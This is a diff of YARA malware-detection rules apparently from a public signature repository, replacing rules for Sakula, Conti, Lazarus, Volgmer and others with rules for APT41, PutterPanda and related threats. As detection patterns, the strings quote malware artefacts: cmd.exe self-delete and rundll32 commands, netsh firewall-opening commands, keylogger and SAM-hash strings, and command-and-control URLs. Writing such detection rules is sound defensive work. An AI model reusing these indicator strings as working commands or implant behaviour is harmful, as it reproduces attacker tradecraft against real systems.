-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sakula.yar#L20-L45"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L159-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b3852b9e7f2b8954be447121bb6b65c3"
-		logic_hash = "ba6d93a1fc5fd81748eb462fc55b681987126ba853ddb677a5f1f9b74ba5cde8"
-		score = 75
+		logic_hash = "c6557bff952454482271d1b52fb37b2dd0471abd237449fd9c94b293ea5218b3"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994"
+		hash2 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
 
 	strings:
-		$str01 = "cmd.exe /c ping 127.0.0.1 & del \"%s\""
-		$str02 = "cmd.exe /c rundll32 \"%s\" Play \"%s\""
-		$str03 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+SV1)"
-		$str04 = "cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c \"%s\""
-		$str05 = "Self Process Id:%d"
-		$str06 = "%d_%d_%d_%s"
-		$str07 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
-		$str08 = "cmd.exe /c rundll32 \"%s\" ActiveQvaw \"%s\""
-		$opcodes01 = { 83 F9 00 74 0E 31 C0 8A 03 D0 C0 34 ?? 88 03 49 43 EB ED }
-		$opcodes02 = { 31 C0 8A 04 13 32 01 83 F8 00 75 0E 83 FA 00 74 04 49 4A }
+		$s1 = "PlusDll.dll" fullword ascii
+		$s2 = "\\Device\\PORTLESS_DeviceName" wide
+		$s3 = "%s%s\\Security" fullword ascii
+		$s4 = "%s\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
+		$s5 = "%s%s\\Enum" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or 3 of them )
 }
-rule SIGNATURE_BASE_Malware_Sakula_Shellcode
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN_2 : FILE
 {
 	meta:
-		description = "Sakula shellcode - taken from decoded setup.msi but may not be unique enough to identify Sakula"
-		author = "David Cannings"
-		id = "147e4894-7877-5367-9f6b-588eb7f0379a"
-		date = "2023-12-05"
+		description = "Detects APT41 malware HIGHNOON.BIN"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37d6a44d-7811-5e87-84e2-b2a8b3da3124"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sakula.yar#L47-L80"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L182-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0e84d91cd1bb0455ac7d2ca78583510388f39cebd95523c5f6f173a50e0c1951"
-		score = 75
+		logic_hash = "1e3d622b4719962f59d95dbf1374c526c22461dd1d9313504f28e8e5c9184272"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
+		hash2 = "c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d"
 
 	strings:
-		$opcodes01 = { 55 89 E5 E8 00 00 00 00 58 83 C0 06 C9 C3 }
-		$opcodes02 = { 8B 5E 3C 8B 5C 1E 78 8B 4C 1E 20 53 8B 5C 1E 24 01 F3 }
+		$x1 = "\\Double\\Door_wh\\" ascii
+		$x2 = "[Stone] Config --> 2k3 TCP Positive Logout." fullword ascii
+		$x3 = "\\RbDoorX64.pdb" ascii
+		$x4 = "RbDoor, Version 1.0" fullword wide
+		$x5 = "About RbDoor" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Conticrypter
+
+rule SIGNATURE_BASE_APT_APT41_Revokedcert_Aug19_1 : FILE
 {
 	meta:
-		description = "Signature for a crypter associated with Conti"
-		author = "James Quinn, Binary Defense"
-		id = "f2a00655-41a2-5614-9c29-3629c93c0e95"
-		date = "2021-03-17"
+		description = "Detects revoked certificates used by APT41 group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f107cc42-58ec-500d-b1c3-27e9e00826aa"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_conti.yar#L2-L16"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L202-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "256fbd028a91da45049e2e861e16e97201f09cb92ab049eda373c80e6a796726"
-		score = 75
+		logic_hash = "f78c1310f99ac1993b01f3469f2f8e0765b79b2ea17fc6e7cff4e99949ca1139"
+		score = 60
 		quality = 85
-		tags = ""
-		tlp = "White"
-
-	strings:
-		$handoff1 = {4C 8D 05 ?? ?? ?? ?? 48 C7 44 24 28 00 00 00 00 C7 44 24 20 00 00 00 00 e8}
-		$handoff2 = {C7 ?? 24 ?? 00 00 00 00 89 44 24 ?? C7 ?? 24 ?? ?? ?? ?? ?? C7 ?? 24 ?? 00 00 00 00 }
-		$garbageLoad1 = {53 48 83 EC 20 89 CB 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 01 D8 48 83 C4 20 5B C3}
-		$garbageLoad2 = {55 89 E5 83 EC 18 C7 ?? 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 45 08 52 C9 C3}
+		tags = "FILE"
 
 	condition:
-		1 of ( $handoff* ) and 1 of ( $garbageLoad* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" or pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" or pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:73:85:f7:02" or pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" or pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" or pe.signatures [ i ] . serial == "53:0c:e1:4c:81:f3:62:10:a1:68:2a:ff:17:9e:25:80" or pe.signatures [ i ] . serial == "54:c6:c1:40:6f:b4:ac:b5:d2:06:74:e9:93:92:c6:3e" or pe.signatures [ i ] . serial == "fd:f2:83:7d:ac:12:b7:bb:30:ad:05:8f:99:9e:cf:00" or pe.signatures [ i ] . serial == "18:63:79:57:5a:31:46:e2:6b:ef:c9:0a:58:0d:1b:d2" or pe.signatures [ i ] . serial == "5c:2f:97:a3:1a:bc:32:b0:8c:ac:01:00:59:8f:32:f6" or pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" or pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" or pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" or pe.signatures [ i ] . serial == "30:d3:c1:67:26:5b:52:0c:b8:7f:25:84:4f:95:cb:04" or pe.signatures [ i ] . serial == "1e:52:bb:f5:c9:0e:c1:64:d0:5b:e0:e4:16:61:52:5f" or pe.signatures [ i ] . serial == "25:f8:78:22:de:56:d3:98:21:59:28:73:ea:09:ca:37" or pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_Keylogger_Unknown_Nov19_1 : FILE
+rule SIGNATURE_BASE_APT_APT41_CN_ELF_Speculoos_Backdoor : FILE
 {
 	meta:
-		description = "Detects unknown keylogger reported by CNMF in November 2019"
+		description = "Detects Speculoos Backdoor used by APT41"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5311d883-52e0-5503-9494-c583fabbedfe"
-		date = "2019-11-06"
+		id = "efe2b368-33af-5382-a5f0-0e7dd7f4dea4"
+		date = "2020-04-14"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/CNMF_VirusAlert/status/1192131508007505921"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_gen.yar#L2-L35"
+		reference = "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L233-L267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a3b5c82cb8aa09e3c1b955bb175046e86f96da1f187eb46df83caaaf9e1370b2"
-		score = 75
+		logic_hash = "ee4cbbc5fc51fb24cbf6017dfb4763ac72a0b23a3b6e794b909e678ebfbabc03"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		hash1 = "04d70bb249206a006f83db39bbe49ff6e520ea329e5fbb9c758d426b1c8dec30"
-		hash2 = "618a67048d0a9217317c1d1790ad5f6b044eaa58a433bd46ec2fb9f9ff563dc6"
+		hash1 = "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167"
+		hash2 = "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28"
 
 	strings:
-		$x1 = "CKeyLogDlg::Keylogger_WriteFile" ascii
-		$x2 = "Keylog file is saved >>>>>> %s" fullword ascii
-		$x3 = "MicCap file is saved >>>>>> %s" fullword ascii
-		$x4 = "cr5cr33nc4p.dat" fullword ascii
-		$xc1 = { 73 74 61 74 75 73 00 00 5C 4B 65 79 6C 6F 67 }
-		$xc2 = { 5B 43 4D 69 63 43 61 70 44 6C 67 5D 2E 00 00 00
-               25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64
-               25 30 32 64 2E 77 61 76 }
-		$xc3 = { 25 73 00 00 25 73 5C 2A 2E 2A 00 00 61 62 00 00
-               5B 25 73 5D 20 75 70 6C 6F 61 64 20 66 61 69 6C
-               65 64 2E 00 72 62 00 00 5B 25 73 5D 20 6F 70 65
-               6E 20 66 61 69 6C 65 64 2E 00 00 00 2E 2E 00 00
-               5B 25 73 20 2D 3E 20 25 73 5D 20 63 6F 70 79 20
-               66 61 69 6C 65 64 }
-		$s1 = "%s\\cmd.exe /c %s" fullword ascii
-		$s2 = "File upload error occured in [CFSDlg::ProcessResultMessage]." fullword ascii
-		$s3 = "\\SAM\\Domains\\Account\\Users\\Names" ascii
-		$s4 = "%s_hist%d:%d:%s:%s:::" fullword ascii
-		$s5 = "CARAT_Ws2_32.dll" fullword ascii
-		$s6 = "PID [%s], open process failed." fullword ascii
+		$xc1 = { 2F 70 72 69 76 61 74 65 2F 76 61 72 00 68 77 2E
+               70 68 79 73 6D 65 6D 00 68 77 2E 75 73 65 72 6D
+               65 6D 00 4E 41 2D 4E 41 2D 4E 41 2D 4E 41 2D 4E
+               41 2D 4E 41 00 6C 6F 30 00 00 00 00 25 30 32 78
+               2D 25 30 32 78 2D 25 30 32 78 2D 25 30 32 78 2D
+               25 30 32 78 2D 25 30 32 78 0A 00 72 00 4E 41 00
+               75 6E 61 6D 65 20 2D 76 }
+		$s1 = "badshell" ascii fullword
+		$s2 = "hw.physmem" ascii fullword
+		$s3 = "uname -v" ascii fullword
+		$s4 = "uname -s" ascii fullword
+		$s5 = "machdep.tsc_freq" ascii fullword
+		$s6 = "/usr/sbin/config.bak" ascii fullword
+		$s7 = "enter MessageLoop..." ascii fullword
+		$s8 = "exit StartCBProcess..." ascii fullword
+		$sc1 = { 72 6D 20 2D 72 66 20 22 25 73 22 00 2F 70 72 6F
+               63 2F }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 40000KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x457f and filesize < 600KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_APT_NK_Lazarus_RC4_Loop : FILE
+rule SIGNATURE_BASE_Gen_Excel_Xor_Obfuscation_Velvetsweatshop : FILE
 {
 	meta:
-		description = "Detects RC4 loop in Lazarus Group implant"
-		author = "f-secure "
-		id = "a9503795-b4b8-505e-a1bf-df64ec8c1c32"
-		date = "2020-06-10"
+		description = "Detects XOR encryption (c. 2003) in Excel file formats"
+		author = "@JohnLaTwc"
+		id = "8a16105c-4f43-5a35-941c-6ee9593b039c"
+		date = "2020-10-09"
 		modified = "2023-12-05"
-		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_aug20.yar#L2-L15"
+		reference = "https://twitter.com/BouncyHat/status/1308896366782042113"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_excel_xor_obfuscation_velvetsweatshop.yar#L3-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0e96bfff924a0c9b39e1ab03097ae0790743417d9da70917d64bc238905971e"
+		logic_hash = "c38d56199d34adfc98d8032321239ab20c6eaa8abcafd56f8e1cf24fd3a4094f"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "da1999c23ee2dae02a169fd2208b9766cb8f046a895f5f52bed45615eea94da0"
+		hash2 = "14a32b8a504db3775e793be59d7bd5b584ea732c3ca060b2398137efbfd18d5a"
+		hash3 = "dd3e89e7bde993f6f1b280f2bf933a5cc2797f4e8736aed4010aaf46e9854f23"
+		hash4 = "4e40253b382b20e273edf82362f1c89e916f7ab8d3c518818a76cb6127d4e7c2"
 
 	strings:
-		$str_rc4_loop = { 41 FE 8? 00 01 00 00 45 0F B6 ?? 00 01 00 00 48
-                        FF C? 43 0F B6 0? ?? 41 00 8? 01 01 00 00 41 0F
-                        B6 ?? 01 01 00 00 }
+		$olemarker = { D0 CF 11 E0 A1 B1 1A E1 00 00 00 }
+		$FilePass_XOR_Obfuscation_VelvetSweatshop = { 2F 00 06 00 00 00 59 B3 0A 9A }
 
 	condition:
-		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and $str_rc4_loop
+		uint32( 0 ) == 0xe011cfd0 and filesize < 400KB and $olemarker at 0 and $FilePass_XOR_Obfuscation_VelvetSweatshop
 }
-rule SIGNATURE_BASE_APT_NK_Lazarus_Network_Backdoor_Unpacked : FILE
+rule SIGNATURE_BASE_MAL_CMD_Script_Obfuscated_Feb19_1 : FILE
 {
 	meta:
-		description = "Detects unpacked variant of Lazarus Group network backdoor"
-		author = "f-secure"
-		id = "8eda9e74-1a19-5510-82d8-cd2eb324629c"
-		date = "2020-06-10"
+		description = "Detects obfuscated batch script using env variable sub-strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8cc99ff5-968c-5b12-9aac-72279c1b8a6b"
+		date = "2019-03-01"
 		modified = "2023-12-05"
-		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_aug20.yar#L17-L41"
+		reference = "https://twitter.com/DbgShell/status/1101076457189793793"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cmd_script_obfuscated.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bfc3cf400eeea332e2e44b65f9728e94af0adde76b32ed4be527b25484f80745"
+		logic_hash = "71c8831686796c921674ec293b5bdf2c42ae9069b258c85c9e0ca6a7f972daf8"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
+		hash1 = "deed88c554c8f9bef4078e9f0c85323c645a52052671b94de039b438a8cff382"
 
 	strings:
-		$str_netsh_1 = "netsh firewall add portopening TCP %d" ascii wide nocase
-		$str_netsh_2 = "netsh firewall delete portopening TCP %d" ascii wide nocase
-		$str_mask_1 = "cmd.exe /c \"%s >> %s 2>&1\"" ascii wide
-		$str_mask_2 = "cmd.exe /c \"%s 2>> %s\"" ascii wide
-		$str_mask_3 = "%s\\%s\\%s" ascii wide
-		$str_other_1 = "perflog.dat" ascii wide nocase
-		$str_other_2 = "perflog.evt" ascii wide nocase
-		$str_other_3 = "cbstc.log" ascii wide nocase
-		$str_other_4 = "LdrGetProcedureAddress" ascii
-		$str_other_5 = "NtProtectVirtualMemory" ascii
+		$h1 = { 40 65 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 }
+		$s1 = { 2C 31 25 0D 0A 65 63 68 6F 20 25 25 }
 
 	condition:
-		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $str_netsh* ) and 1 of ( $str_mask* ) and 1 of ( $str_other* )
+		uint16( 0 ) == 0x6540 and filesize < 200KB and $h1 at 0 and uint16( filesize -3 ) == 0x0d25 and uint8( filesize -1 ) == 0x0a and $s1 in ( filesize -200 .. filesize )
 }
-rule SIGNATURE_BASE_TA17_318B_Volgmer : FILE
+rule SIGNATURE_BASE_Cobaltgang_PDF_Metadata_Rev_A
 {
 	meta:
-		description = "Malformed User Agent in Volgmer malware"
-		author = "US CERT"
-		id = "20a7f64b-0fee-5235-ac91-2fc811497ac6"
-		date = "2017-11-15"
+		description = "Find documents saved from the same potential Cobalt Gang PDF template"
+		author = "Palo Alto Networks Unit 42"
+		id = "bcf5bf6e-c786-5f78-bf58-e0631a17e62e"
+		date = "2018-10-25"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318B.yar#L9-L20"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobalt_gang_pdf.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2b3a7e501214767b7d79b33fb560b5611fa3726036a0c98d6f1904a55f306e40"
+		logic_hash = "8020ccff761b49d98e18cd5cb3c0695956a88e86a0958bfba1a19b7e3e629bb9"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s = "Mozillar/"
+		$ = "<xmpMM:DocumentID>uuid:31ac3688-619c-4fd4-8e3f-e59d0354a338" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $s
+		any of them
 }
-
-rule SIGNATURE_BASE_Volgmer_Malware : FILE
+rule SIGNATURE_BASE_Coreimpact_Sysdll_Exe
 {
 	meta:
-		description = "Detects Volgmer malware as reported in US CERT TA17-318B"
+		description = "Detects a malware sysdll.exe from the Rocket Kitten APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a8df5f70-69e7-5c95-8af7-7dda6bb9c77a"
-		date = "2017-11-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318B.yar#L34-L71"
+		id = "bac55c00-5d14-59ca-8597-f52b4577be0c"
+		date = "2014-12-27"
+		modified = "2023-01-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_coreimpact_agent.yar#L6-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "898c2734c56a40aa4d24c1eac2dfb7dd1f98b0bdf7a11ab518eef282becb84b6"
-		score = 75
+		hash = "f89a4d4ae5cca6d69a5256c96111e707"
+		logic_hash = "332b68e797e8ee3e26d797e106ae31e7240585ccb0ea599bebd8ac8f94313eab"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd"
-		hash2 = "8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b"
-		hash3 = "eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5"
-		hash4 = "e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11"
-		hash5 = "6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1"
-		hash6 = "fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9"
-		hash7 = "53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d"
-		hash8 = "1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d"
+		tags = ""
 
 	strings:
-		$x1 = "User-Agent: Mozillar/5.0" fullword ascii
-		$x2 = "[Cmd] - CMD_BOTCMD_CONNLOG_GET" fullword wide
-		$x3 = "[TestConnect To Bot] - Port = %d" fullword ascii
-		$x4 = "b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7" ascii
-		$s1 = "%sigfx%c%c%c.exe" fullword wide
-		$s2 = "H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT" fullword ascii
-		$s3 = "cmd.exe /c %s > %s 2>&1" fullword wide
-		$s4 = "%s\\dllcache\\%s.dll" fullword ascii
-		$s5 = "Cond Fail." fullword ascii
-		$s6 = "The %s %s%s" fullword ascii
-		$s7 = "%s \"%s\"%s \"%s\" %s \"%s\"" fullword ascii
-		$s8 = "DLL_Spider.dll" fullword ascii
+		$s0 = "d:\\nightly\\sandbox_avg10_vc9_SP1_2011\\source\\avg10\\avg9_all_vs90\\bin\\Rele" ascii
+		$s1 = "Mozilla/5.0" fullword ascii
+		$s3 = "index.php?c=%s&r=%lx" fullword ascii
+		$s4 = "index.php?c=%s&r=%x" fullword ascii
+		$s5 = "127.0.0.1" fullword ascii
+		$s6 = "/info.dat" ascii
+		$s7 = "needroot" fullword ascii
+		$s8 = "./plugins/" ascii
 
 	condition:
-		filesize < 400KB and ( 1 of ( $x* ) or ( uint16( 0 ) == 0x5a4d and 2 of them ) ) or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "ea42395e901b33bad504798e0f0fd74b" )
+		$s0 or 6 of them
 }
-
-rule SIGNATURE_BASE_Shadowpad_Nssock2 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel : FILE
 {
 	meta:
-		description = "Detects malicious nssock2.dll from ShadowPad incident - file nssock2.dll"
+		description = "Detects an APT malware related to PutterPanda"
 		author = "Florian Roth (Nextron Systems)"
-		id = "47ecc7f8-065a-558b-9bba-300fd28f4eab"
-		date = "2017-08-15"
+		id = "980922cb-edfb-50ab-a102-a8168aa2b0e0"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/shadowpad-in-corporate-networks/81432/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shadowpad.yar#L13-L35"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea9675d5acfdc80cfa787db2c2dfe2169aa7c5e3ead35f020d0b0b664ecb4bf4"
-		score = 75
+		hash = "5367e183df155e3133d916f7080ef973f7741d34"
+		logic_hash = "f2ffab73993c578f47e17babc2e65301b3720e438b33e57f2af31b7183bfd20f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
-		hash2 = "c45116a22cf5695b618fcdf1002619e8544ba015d06b2e1dbf47982600c7545f"
-		hash3 = "696be784c67896b9239a8af0a167add72b1becd3ef98d03e99207a3d5734f6eb"
-		hash4 = "515d3110498d7b4fdb451ed60bb11cd6835fcff4780cb2b982ffd2740e1347a0"
-		hash5 = "536d7e3bd1c9e1c2fd8438ab75d6c29c921974560b47c71686714d12fb8e9882"
-		hash6 = "637fa40cf7dd0252c87140f7895768f42a370551c87c37a3a77aac00eb17d72e"
+
+	strings:
+		$x0 = "app.stream-media.net" fullword ascii
+		$x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii
+		$s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii
+		$s7 = "Connect %s error!" fullword ascii
+		$s9 = "Download file %s successfully!" fullword ascii
+		$s10 = "index.tmp" fullword ascii
+		$s11 = "Execute PE Successfully" fullword ascii
+		$s13 = "aa/22/success.xml" fullword ascii
+		$s16 = "aa/22/index.asp" fullword ascii
+		$s18 = "File %s a Non-Pe File" fullword ascii
+		$s19 = "SendRequset error!" fullword ascii
+		$s20 = "filelist[%d]=%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "c67de089f2009b21715744762fc484e8" or pe.imphash ( ) == "11522f7d4b2fc05acba8f534ca1b828a" ) )
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 4 of ( $s* ) )
 }
-
-rule SIGNATURE_BASE_Sofacy_Oct17_1 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel_2 : FILE
 {
 	meta:
-		description = "Detects Sofacy malware reported in October 2017"
+		description = "APT Malware related to PutterPanda Group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6896dcf3-e422-5a40-bc1e-d1f35ae95c14"
-		date = "2017-10-23"
+		id = "3eef8869-45d6-57a4-a182-c5349b034cf4"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_oct17_camp.yar#L13-L47"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L30-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c3620d0b347e6cc54af9e046f6b3b6515bfa23dd11225ce2720e09838708a42e"
-		score = 75
+		hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381"
+		logic_hash = "60a48288cb106135728fb676ecad2b9be5254d5dc5094da158ea9dc07704c9ab"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805"
 
 	strings:
-		$x1 = "%localappdata%\\netwf.dll" fullword wide
-		$x2 = "set path = \"%localappdata%\\netwf.dll\"" fullword ascii
-		$x3 = "%localappdata%\\netwf.bat" fullword wide
-		$x4 = "KlpSvc.dll" fullword ascii
-		$g1 = "set path = \"%localappdata%\\" ascii
-		$g2 = "%localappdata%\\" wide
-		$s1 = "start rundll32.exe %path %,#1a" fullword ascii
-		$s2 = "gshell32" fullword wide
-		$s3 = "s - %lu" fullword ascii
-		$s4 = "be run i" fullword ascii
-		$s5 = "ingToBinhary" fullword ascii
-		$s6 = "%j%Xjs" fullword ascii
-		$s7 = "if NOT exist %path % (exit)" fullword ascii
+		$s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii
+		$s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii
